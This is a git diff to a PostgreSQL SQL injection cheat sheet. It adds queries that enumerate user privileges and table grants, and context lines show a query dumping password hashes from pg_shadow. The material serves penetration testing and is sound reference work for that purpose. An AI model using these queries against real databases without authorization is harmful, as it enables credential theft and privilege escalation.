diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index 845655e..d53196c 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -76,9 +76,14 @@ SELECT usename, passwd FROM pg_shadow SELECT usename FROM pg_user WHERE usesuper IS TRUE ``` ## PostgreSQL List Privileges - +Gather information from the [`pg_user`](https://www.postgresql.org/docs/current/view-pg-user.html) table: ```sql -SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user +SELECT * FROM pg_user +``` + +Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`: +```sql +SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema'); ``` ## PostgreSQL Check if Current User is Superuser @@ -277,4 +282,4 @@ SELECT $TAG$This is another string$TAG$ - [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet) - [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/) - [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803) -- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli) \ No newline at end of file +- [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)